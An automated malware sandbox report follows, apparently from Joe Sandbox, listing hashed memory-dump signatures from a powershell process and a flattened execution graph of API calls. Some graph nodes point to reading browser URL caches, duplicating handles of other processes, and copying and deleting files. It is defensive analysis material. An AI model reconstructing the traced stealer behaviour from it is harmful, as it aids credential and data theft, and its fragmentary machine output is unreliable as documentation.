                                                • API String ID:
                                                • Opcode ID: b61d2f2fb510503be9343f51f545c456249d1189e9e8bdf187e0a212d76d380b
                                                • Instruction ID: 2cced5e95ff1cca09900dd8561953e64c1347c12777cc0fd04131e7ecc0edf2b
                                                • Opcode Fuzzy Hash: b61d2f2fb510503be9343f51f545c456249d1189e9e8bdf187e0a212d76d380b
                                                • Instruction Fuzzy Hash: 5C012671409340DAEB20AE29CDC4BA7BFA8DF41320F3CC41AEC4A0B246D379D845CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3196093327.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67a49f2b08efed58b82cbbdaa76ffd1e46b5718a0cf9b0e36b082e90ce8db342
                                                • Instruction ID: ab0296e5385a89fa4dee2bee1720a7784db5b260e51b7314666607d68e3bbf28
                                                • Opcode Fuzzy Hash: 67a49f2b08efed58b82cbbdaa76ffd1e46b5718a0cf9b0e36b082e90ce8db342
                                                • Instruction Fuzzy Hash: CF015E6140E3C09ED7128B258D94B92BFB4DF53224F1DC4DBE8888F2A7D2695C49C772
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe7e694281c5457d998dfbbda86cfbe6625330a7a179b5f783994c57c4d6d8c8
                                                • Instruction ID: 62a98bf89bb74d5e747fc59874b4f1e14afe5e487ee711b362a0ac452c036ab3
                                                • Opcode Fuzzy Hash: fe7e694281c5457d998dfbbda86cfbe6625330a7a179b5f783994c57c4d6d8c8
                                                • Instruction Fuzzy Hash: 1C0126312043409FC725C708C808BA27BE8AF863A9F1981AED0488F263CF75DC47D751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ebdaef67102626fb9ced984f9d2ef1f51cb65496be00359a6deaee5f0561f91
                                                • Instruction ID: e35da303df05bd64463c91d32453d127ab3e0730e816181daad29eb088383613
                                                • Opcode Fuzzy Hash: 6ebdaef67102626fb9ced984f9d2ef1f51cb65496be00359a6deaee5f0561f91
                                                • Instruction Fuzzy Hash: B6016275D0060A8FC740DF68D4459AABFF0FF09314F204299EA45DB762D731A981DBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7244205d9c0b4ffc1332993a32b1cbd4b0847c32af331fdb2fbaa4be16a439b1
                                                • Instruction ID: 0ffecb90d7f10de7a9bc3e498b372d2159fc6ac193a9ccfd99822a77af62a90f
                                                • Opcode Fuzzy Hash: 7244205d9c0b4ffc1332993a32b1cbd4b0847c32af331fdb2fbaa4be16a439b1
                                                • Instruction Fuzzy Hash: 57F065356012158FC305DB10D1146A5BB61EB853D9F0582EED0498F2A3CF39D947D755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 278ce1428344202becd69c1e5157b505849c528b166144c2f09f22ebfd623f5d
                                                • Instruction ID: 3613b3ee567b285c95275a8839637bd08020124d2ef2a8b2194a33b219c47e5b
                                                • Opcode Fuzzy Hash: 278ce1428344202becd69c1e5157b505849c528b166144c2f09f22ebfd623f5d
                                                • Instruction Fuzzy Hash: A4F0A9B4E0020A8FCB80DFA8C485AAEBBF1FF49314F604199E909DB321D730A955CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96e837727a97d86e15b9e93441fda7ede750d0980c8d2726b984e581f0c97e72
                                                • Instruction ID: c43166b648a26fa0c4d739e7aaff5ac8357a376338a9980a70563f7039bc0700
                                                • Opcode Fuzzy Hash: 96e837727a97d86e15b9e93441fda7ede750d0980c8d2726b984e581f0c97e72
                                                • Instruction Fuzzy Hash: 7BE022322002016BC700E728D885A9A3762EFC5340B104429F201CB659DF6CAC42ABA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec1b8a624990d9bc6d34841bec3e1ac10e0ca624738b27bf40381df71222cafa
                                                • Instruction ID: 5ffe05f51b0a02482b1b5b680ae3be923adaa0ce782a7c5e3092fb0198fa5f18
                                                • Opcode Fuzzy Hash: ec1b8a624990d9bc6d34841bec3e1ac10e0ca624738b27bf40381df71222cafa
                                                • Instruction Fuzzy Hash: 4ED0A7322482919FCB039220B4240A57F24A9433A931445EBE108CE443DD25C047D773
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq$ml$ml
                                                • API String ID: 0-1864781066
                                                • Opcode ID: 1ee39a0cc1e3b6aa3c49dd9df440bb30e98887a336863e6ede12da917d620cf4
                                                • Instruction ID: 5eea63584decfdbb0fd0e55b5d6b1c0f28a1cb87034f94beb8063fd89a335c5b
                                                • Opcode Fuzzy Hash: 1ee39a0cc1e3b6aa3c49dd9df440bb30e98887a336863e6ede12da917d620cf4
                                                • Instruction Fuzzy Hash: 8BE13BB17043468FCB259A79A8116A6BFF2BFC6310F1484AFD545CF292DA31C881C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3550717347
                                                • Opcode ID: cb18b9e983354ba2fb7e76b71f2da68a0ed766affd8aad593d8d850b8a6b6541
                                                • Instruction ID: 9e36115d2d151903197c83c4315e3f5e5c3c347ad8d2a5ffd96e21e12117f169
                                                • Opcode Fuzzy Hash: cb18b9e983354ba2fb7e76b71f2da68a0ed766affd8aad593d8d850b8a6b6541
                                                • Instruction Fuzzy Hash: E3C13AB170020A8FCB258F79E8416BABBA6BFC5311F24847BD445CB251FB72C961C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3490351150
                                                • Opcode ID: da6def2708c9ea75afbea5821ff991944b750819da96f4780d08adb3eca6044c
                                                • Instruction ID: 4f645661934f9ef36d56a4f724e80de06e52b5072dea6a7afb1cd84ee4a79872
                                                • Opcode Fuzzy Hash: da6def2708c9ea75afbea5821ff991944b750819da96f4780d08adb3eca6044c
                                                • Instruction Fuzzy Hash: 07A119B1B002569FCB249F68E4416FABBA6FBC9320F14C46BD9458B281DF31DD41CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-915829551
                                                • Opcode ID: 8b8c74118a8f124c78afd8c1a124f9257f4ccd230ca3428885beb24c08174e18
                                                • Instruction ID: 7eacb831a70d41d8f59db53cdb95df5ce6a33062723705d8dc0110a1a8522a04
                                                • Opcode Fuzzy Hash: 8b8c74118a8f124c78afd8c1a124f9257f4ccd230ca3428885beb24c08174e18
                                                • Instruction Fuzzy Hash: 34B106F1B14216DFDB248B69E8516BABBE6FFC5310F14846BD5088B2D1DB31D841CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p$p$p$p$p$p
                                                • API String ID: 0-222779563
                                                • Opcode ID: 489e1b3b8cf8e7f69f4f8f76714617fd992edc61f4244812e8e1bcc10e6f4494
                                                • Instruction ID: 6438082e7da11f62f0d314aeda740aedadd62e54139138d14cc98c934108b885
                                                • Opcode Fuzzy Hash: 489e1b3b8cf8e7f69f4f8f76714617fd992edc61f4244812e8e1bcc10e6f4494
                                                • Instruction Fuzzy Hash: D0118456C0E3D15FE31A4224A8652937F25CB67285F1902E38CD8CF1E3E84C0D0BC792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-481192504
                                                • Opcode ID: eb16171489fa5e902cdf0c8813814dc4817a6670c55612f7f9f6a52c9c14afe6
                                                • Instruction ID: 8e80df3e861ea47364e9d8ada567db2ee05f8432e69ebe8e2b95b5f3e9129c06
                                                • Opcode Fuzzy Hash: eb16171489fa5e902cdf0c8813814dc4817a6670c55612f7f9f6a52c9c14afe6
                                                • Instruction Fuzzy Hash: 9641D2B1A04285DFDF34CE45E5407E6B7AABF85320F19C4ABD9199B291C731DC80CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-420214106
                                                • Opcode ID: 3fa6b4c273e20e5939146b867c624b58077433ef6570e27e1d109dada13d7bbc
                                                • Instruction ID: d9d5ec3610a6bb6a360a01a4624467d8565260707849bf909da3c70d810e9ede
                                                • Opcode Fuzzy Hash: 3fa6b4c273e20e5939146b867c624b58077433ef6570e27e1d109dada13d7bbc
                                                • Instruction Fuzzy Hash: CA21E0F161120EDFDB348E16E580BF573A5BF41211F58846BE8058B271F7B1D8A0C691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$ml$ml
                                                • API String ID: 0-125666307
                                                • Opcode ID: b7bae60d237966eecadaa2653c886dbc9ca273c4179a8906082eb71f3c85d90f
                                                • Instruction ID: 0b0b5bcef97314d0a4bbb8ced897defbc057cf9d8b6847a8fdf72f24c8784007
                                                • Opcode Fuzzy Hash: b7bae60d237966eecadaa2653c886dbc9ca273c4179a8906082eb71f3c85d90f
                                                • Instruction Fuzzy Hash: C111E9B17103169BEB24592AEC047A7F7D7BBC1761F28842BE44D862D1EA31D481C3D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 82a390088f8592335051da4e31e837569f515f82e82640dfaaaf86619deccab2
                                                • Instruction ID: e87430c704d99fce71c82bc19ff28dfb998fcb21a0e877c72a5246102ad00684
                                                • Opcode Fuzzy Hash: 82a390088f8592335051da4e31e837569f515f82e82640dfaaaf86619deccab2
                                                • Instruction Fuzzy Hash: 3C3139F27102166BDA345939A8027BB7B9BABC1754F54843AA901CF382FE76CC50C3B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84ul$84ul$tPcq$tPcq
                                                • API String ID: 0-973537647
                                                • Opcode ID: 8193a7caf9112cfe970b71c781873d5a637c93c483ae59af24be3a4bfbbb0d74
                                                • Instruction ID: c98a67110cfadd52a3c6b87177a6e6c10aebb78b7c129b13baa7f5c150d2199d
                                                • Opcode Fuzzy Hash: 8193a7caf9112cfe970b71c781873d5a637c93c483ae59af24be3a4bfbbb0d74
                                                • Instruction Fuzzy Hash: C33149B06042555FC7119B6858106AABFB5EF8A320F59849BE944DF3D2CB719C84C7F2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: cd78ed2e6b1290a4059e744c0cf582d449fa02da4b8a3c69995dce22ce176be0
                                                • Instruction ID: b7088f903189f1ab1eb0a289271f551d6e496fa36657e14479ab696c550f0bf7
                                                • Opcode Fuzzy Hash: cd78ed2e6b1290a4059e744c0cf582d449fa02da4b8a3c69995dce22ce176be0
                                                • Instruction Fuzzy Hash: 782137F23103169BDB745979A8857A3BBEABBC0710F24842BA50DCB3C2DD75E841C362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:6.4%
                                                Dynamic/Decrypted Code Coverage:9.2%
                                                Signature Coverage:1.5%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:84
38731->38733 38732 403fb7 38732->38388 38733->38729 38733->38731 38734 4099c6 2 API calls 38733->38734 38735 40a8ab 9 API calls 38733->38735 38734->38733 38735->38733 38737 414c2e 16 API calls 38736->38737 38738 403d26 38737->38738 38739 414c2e 16 API calls 38738->38739 38740 403d34 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d51 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d6c 38743->38744 38745 409d1f 6 API calls 38744->38745 38746 403d84 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403d98 38747->38748 38749 403af5 20 API calls 38748->38749 38750 403da9 38749->38750 38751 40414f 33 API calls 38750->38751 38752 403dbe 38751->38752 38753 403e1e 38752->38753 38754 403dca memset 38752->38754 38757 4099c6 2 API calls 38752->38757 38758 40a8ab 9 API calls 38752->38758 39670 40b1ab ??3@YAXPAX ??3@YAXPAX 38753->39670 38754->38752 38756 403e26 38756->38392 38757->38752 38758->38752 38760 414b81 9 API calls 38759->38760 38761 414c40 38760->38761 38762 414c73 memset 38761->38762 39671 409cea 38761->39671 38764 414c94 38762->38764 39674 414592 RegOpenKeyExW 38764->39674 38766 414c64 38766->38383 38768 414cc1 38769 414cf4 wcscpy 38768->38769 39675 414bb0 wcscpy 38768->39675 38769->38766 38771 414cd2 39676 4145ac RegQueryValueExW 38771->39676 38773 414ce9 RegCloseKey 38773->38769 38775 409d62 38774->38775 38776 409d43 wcscpy 38774->38776 38775->38416 38777 409719 2 API calls 38776->38777 38778 409d51 wcscat 38777->38778 38778->38775 38780 40aebe FindClose 38779->38780 38781 40ae21 38780->38781 38782 4099c6 2 API calls 38781->38782 38783 40ae35 38782->38783 38784 409d1f 6 API calls 38783->38784 38785 40ae49 38784->38785 38785->38459 38787 40ade0 38786->38787 38788 40ae0f 38786->38788 38787->38788 38789 40ade7 wcscmp 38787->38789 38788->38459 38789->38788 38790 40adfe wcscmp 38789->38790 38790->38788 38792 40ae18 9 API calls 38791->38792 38798 4453c4 38792->38798 38793 40ae51 9 API calls 38793->38798 38794 4453f3 38796 40aebe FindClose 
38794->38796 38795 40add4 2 API calls 38795->38798 38797 4453fe 38796->38797 38797->38459 38798->38793 38798->38794 38798->38795 38799 445403 253 API calls 38798->38799 38799->38798 38801 40ae7b FindNextFileW 38800->38801 38802 40ae5c FindFirstFileW 38800->38802 38803 40ae94 38801->38803 38804 40ae8f 38801->38804 38802->38803 38806 409d1f 6 API calls 38803->38806 38807 40aeb6 38803->38807 38805 40aebe FindClose 38804->38805 38805->38803 38806->38807 38807->38459 38808->38391 38809->38445 38810->38426 38811->38426 38812->38460 38814 409c89 38813->38814 38814->38482 38815->38512 38817 413d39 38816->38817 38818 413d2f FreeLibrary 38816->38818 38819 40b633 ??3@YAXPAX 38817->38819 38818->38817 38820 413d42 38819->38820 38821 40b633 ??3@YAXPAX 38820->38821 38822 413d4a 38821->38822 38822->38340 38823->38343 38824->38394 38825->38408 38827 44db70 38826->38827 38828 40b6fc memset 38827->38828 38829 409c70 2 API calls 38828->38829 38830 40b732 wcsrchr 38829->38830 38831 40b743 38830->38831 38832 40b746 memset 38830->38832 38831->38832 38833 40b2cc 27 API calls 38832->38833 38834 40b76f 38833->38834 38835 409d1f 6 API calls 38834->38835 38836 40b783 38835->38836 39677 409b98 GetFileAttributesW 38836->39677 38838 40b792 38839 40b7c2 38838->38839 38840 409c70 2 API calls 38838->38840 39678 40bb98 38839->39678 38842 40b7a5 38840->38842 38844 40b2cc 27 API calls 38842->38844 38848 40b7b2 38844->38848 38845 40b837 FindCloseChangeNotification 38847 40b83e memset 38845->38847 38846 40b817 39712 409a45 GetTempPathW 38846->39712 39711 40a6e6 WideCharToMultiByte 38847->39711 38851 409d1f 6 API calls 38848->38851 38851->38839 38852 40b827 CopyFileW 38852->38847 38853 40b866 38854 444432 121 API calls 38853->38854 38855 40b879 38854->38855 38856 40bad5 38855->38856 38857 40b273 27 API calls 38855->38857 38858 40baeb 38856->38858 38859 40bade DeleteFileW 38856->38859 38860 40b89a 38857->38860 38861 40b04b ??3@YAXPAX 38858->38861 38859->38858 38862 438552 134 API calls 38860->38862 38863 
40baf3 38861->38863 38864 40b8a4 38862->38864 38863->38419 38865 40bacd 38864->38865 38867 4251c4 137 API calls 38864->38867 38866 443d90 111 API calls 38865->38866 38866->38856 38890 40b8b8 38867->38890 38868 40bac6 39724 424f26 123 API calls 38868->39724 38869 40b8bd memset 39715 425413 17 API calls 38869->39715 38872 425413 17 API calls 38872->38890 38875 40a71b MultiByteToWideChar 38875->38890 38876 40a734 MultiByteToWideChar 38876->38890 38879 40b9b5 memcmp 38879->38890 38880 4099c6 2 API calls 38880->38890 38881 404423 37 API calls 38881->38890 38884 40bb3e memset memcpy 39725 40a734 MultiByteToWideChar 38884->39725 38885 4251c4 137 API calls 38885->38890 38887 40bb88 LocalFree 38887->38890 38890->38868 38890->38869 38890->38872 38890->38875 38890->38876 38890->38879 38890->38880 38890->38881 38890->38884 38890->38885 38891 40ba5f memcmp 38890->38891 39716 4253ef 16 API calls 38890->39716 39717 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38890->39717 39718 4253af 17 API calls 38890->39718 39719 4253cf 17 API calls 38890->39719 39720 447280 memset 38890->39720 39721 447960 memset memcpy memcpy memcpy 38890->39721 39722 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38890->39722 39723 447920 memcpy memcpy memcpy 38890->39723 38891->38890 38892->38421 38894 40aed1 38893->38894 38895 40aec7 FindClose 38893->38895 38894->38353 38895->38894 38897 4099d7 38896->38897 38898 4099da memcpy 38896->38898 38897->38898 38898->38404 38900 40b2cc 27 API calls 38899->38900 38901 44543f 38900->38901 38902 409d1f 6 API calls 38901->38902 38903 44544f 38902->38903 39817 409b98 GetFileAttributesW 38903->39817 38905 44545e 38906 445476 38905->38906 38907 40b6ef 252 API calls 38905->38907 38908 40b2cc 27 API calls 38906->38908 38907->38906 38909 445482 38908->38909 38910 409d1f 6 API calls 38909->38910 38911 445492 38910->38911 39818 409b98 GetFileAttributesW 38911->39818 38913 4454a1 38914 4454b9 38913->38914 38915 40b6ef 252 API calls 38913->38915 38914->38434 38915->38914 
38916->38433 38917->38450 38918->38456 38919->38493 38920->38471 38921->38520 38922->38520 38923->38503 38924->38531 38925->38533 38926->38535 38928 414c2e 16 API calls 38927->38928 38929 40c2ae 38928->38929 38999 40c1d3 38929->38999 38934 40c3be 38951 40a8ab 38934->38951 38935 40afcf 2 API calls 38936 40c2fd FindFirstUrlCacheEntryW 38935->38936 38937 40c3b6 38936->38937 38938 40c31e wcschr 38936->38938 38939 40b04b ??3@YAXPAX 38937->38939 38940 40c331 38938->38940 38941 40c35e FindNextUrlCacheEntryW 38938->38941 38939->38934 38942 40a8ab 9 API calls 38940->38942 38941->38938 38943 40c373 GetLastError 38941->38943 38946 40c33e wcschr 38942->38946 38944 40c3ad FindCloseUrlCache 38943->38944 38945 40c37e 38943->38945 38944->38937 38947 40afcf 2 API calls 38945->38947 38946->38941 38948 40c34f 38946->38948 38949 40c391 FindNextUrlCacheEntryW 38947->38949 38950 40a8ab 9 API calls 38948->38950 38949->38938 38949->38944 38950->38941 39115 40a97a 38951->39115 38954 40a8cc 38954->38542 38955 40a8d0 7 API calls 38955->38954 39120 40b1ab ??3@YAXPAX ??3@YAXPAX 38956->39120 38958 40c3dd 38959 40b2cc 27 API calls 38958->38959 38960 40c3e7 38959->38960 39121 414592 RegOpenKeyExW 38960->39121 38962 40c3f4 38963 40c50e 38962->38963 38964 40c3ff 38962->38964 38978 405337 38963->38978 38965 40a9ce 4 API calls 38964->38965 38966 40c418 memset 38965->38966 39122 40aa1d 38966->39122 38969 40c471 38971 40c47a _wcsupr 38969->38971 38970 40c505 RegCloseKey 38970->38963 38972 40a8d0 7 API calls 38971->38972 38973 40c498 38972->38973 38974 40a8d0 7 API calls 38973->38974 38975 40c4ac memset 38974->38975 38976 40aa1d 38975->38976 38977 40c4e4 RegEnumValueW 38976->38977 38977->38970 38977->38971 39124 405220 38978->39124 38982 4099c6 2 API calls 38981->38982 38983 40a714 _wcslwr 38982->38983 38984 40c634 38983->38984 39181 405361 38984->39181 38987 40c65c wcslen 39184 4053b6 39 API calls 38987->39184 38988 40c71d wcslen 38988->38549 38990 40c677 38991 40c713 38990->38991 39185 40538b 39 API 
calls 38990->39185 39187 4053df 39 API calls 38991->39187 38994 40c6a5 38994->38991 38995 40c6a9 memset 38994->38995 38996 40c6d3 38995->38996 39186 40c589 43 API calls 38996->39186 38998->38550 39000 40ae18 9 API calls 38999->39000 39006 40c210 39000->39006 39001 40ae51 9 API calls 39001->39006 39002 40c264 39003 40aebe FindClose 39002->39003 39005 40c26f 39003->39005 39004 40add4 2 API calls 39004->39006 39011 40e5ed memset memset 39005->39011 39006->39001 39006->39002 39006->39004 39007 40c231 _wcsicmp 39006->39007 39008 40c1d3 35 API calls 39006->39008 39007->39006 39009 40c248 39007->39009 39008->39006 39024 40c084 22 API calls 39009->39024 39012 414c2e 16 API calls 39011->39012 39013 40e63f 39012->39013 39014 409d1f 6 API calls 39013->39014 39015 40e658 39014->39015 39025 409b98 GetFileAttributesW 39015->39025 39017 40e667 39018 40e680 39017->39018 39019 409d1f 6 API calls 39017->39019 39026 409b98 GetFileAttributesW 39018->39026 39019->39018 39021 40e68f 39022 40c2d8 39021->39022 39027 40e4b2 39021->39027 39022->38934 39022->38935 39024->39006 39025->39017 39026->39021 39048 40e01e 39027->39048 39029 40e593 39031 40e5b0 39029->39031 39032 40e59c DeleteFileW 39029->39032 39030 40e521 39030->39029 39071 40e175 39030->39071 39033 40b04b ??3@YAXPAX 39031->39033 39032->39031 39034 40e5bb 39033->39034 39036 40e5c4 CloseHandle 39034->39036 39037 40e5cc 39034->39037 39036->39037 39039 40b633 ??3@YAXPAX 39037->39039 39038 40e573 39040 40e584 39038->39040 39041 40e57c FindCloseChangeNotification 39038->39041 39042 40e5db 39039->39042 39114 40b1ab ??3@YAXPAX ??3@YAXPAX 39040->39114 39041->39040 39045 40b633 ??3@YAXPAX 39042->39045 39044 40e540 39044->39038 39091 40e2ab 39044->39091 39046 40e5e3 39045->39046 39046->39022 39049 406214 22 API calls 39048->39049 39050 40e03c 39049->39050 39051 40e16b 39050->39051 39052 40dd85 74 API calls 39050->39052 39051->39030 39053 40e06b 39052->39053 39053->39051 39054 40afcf ??2@YAPAXI ??3@YAXPAX 39053->39054 39055 40e08d 
OpenProcess 39054->39055 39056 40e0a4 GetCurrentProcess DuplicateHandle 39055->39056 39060 40e152 39055->39060 39057 40e0d0 GetFileSize 39056->39057 39058 40e14a CloseHandle 39056->39058 39061 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39057->39061 39058->39060 39059 40e160 39063 40b04b ??3@YAXPAX 39059->39063 39060->39059 39062 406214 22 API calls 39060->39062 39064 40e0ea 39061->39064 39062->39059 39063->39051 39065 4096dc CreateFileW 39064->39065 39066 40e0f1 CreateFileMappingW 39065->39066 39067 40e140 CloseHandle CloseHandle 39066->39067 39068 40e10b MapViewOfFile 39066->39068 39067->39058 39069 40e13b FindCloseChangeNotification 39068->39069 39070 40e11f WriteFile UnmapViewOfFile 39068->39070 39069->39067 39070->39069 39072 40e18c 39071->39072 39073 406b90 11 API calls 39072->39073 39074 40e19f 39073->39074 39075 40e1a7 memset 39074->39075 39076 40e299 39074->39076 39081 40e1e8 39075->39081 39077 4069a3 ??3@YAXPAX ??3@YAXPAX 39076->39077 39078 40e2a4 39077->39078 39078->39044 39079 406e8f 13 API calls 39079->39081 39080 406b53 SetFilePointerEx ReadFile 39080->39081 39081->39079 39081->39080 39082 40e283 39081->39082 39083 40dd50 _wcsicmp 39081->39083 39087 40742e 8 API calls 39081->39087 39088 40aae3 wcslen wcslen _memicmp 39081->39088 39089 40e244 _snwprintf 39081->39089 39084 40e291 39082->39084 39085 40e288 ??3@YAXPAX 39082->39085 39083->39081 39086 40aa04 ??3@YAXPAX 39084->39086 39085->39084 39086->39076 39087->39081 39088->39081 39090 40a8d0 7 API calls 39089->39090 39090->39081 39092 40e2c2 39091->39092 39093 406b90 11 API calls 39092->39093 39104 40e2d3 39093->39104 39094 40e4a0 39095 4069a3 ??3@YAXPAX ??3@YAXPAX 39094->39095 39097 40e4ab 39095->39097 39096 406e8f 13 API calls 39096->39104 39097->39044 39098 406b53 SetFilePointerEx ReadFile 39098->39104 39099 40e489 39100 40aa04 ??3@YAXPAX 39099->39100 39101 40e491 39100->39101 39101->39094 39102 40e497 ??3@YAXPAX 39101->39102 39102->39094 39103 40dd50 _wcsicmp 39103->39104 39104->39094 
